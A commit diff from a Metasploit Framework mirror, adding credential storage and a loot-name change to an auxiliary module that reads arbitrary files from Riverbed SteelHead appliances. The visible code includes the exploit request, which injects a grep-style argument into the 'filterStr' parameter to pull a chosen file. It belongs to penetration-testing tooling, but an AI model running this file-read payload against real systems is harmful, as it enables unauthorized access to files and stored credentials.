infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add storing creds and loot name consistency

bug/bundler_fix
h00die 2017-06-04 17:46:43 -04:00
parent ea5db9a039
commit de86c5d991
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb
View File

@ -88,13 +88,15 @@ class MetasploitModule < Msf::Auxiliary
return
elsif res.code == 200
vprint_good('Authenticated Successfully')
cookie = res.get_cookies
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'], proof: cookie)
end
# pull the file
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'modules/common/logs'),
'method' => 'GET',
'cookie' => res.get_cookies,
'cookie' => cookie,
'vars_get' => {
'filterStr' => "msg:-e .* #{datastore['FILE']}"
}
@ -122,7 +124,7 @@ class MetasploitModule < Msf::Auxiliary
if reconstructed_file.any?
reconstructed_file = reconstructed_file.join("\n")
vprint_good("File Contents:\n#{reconstructed_file}")
stored_path = store_loot('host.file', 'text/plain', rhost, reconstructed_file, datastore['FILE'])
stored_path = store_loot('host.files', 'text/plain', rhost, reconstructed_file, datastore['FILE'])
print_good("Stored #{datastore['FILE']} to #{stored_path}")
else
print_error("File not found or empty file: #{datastore['FILE']}")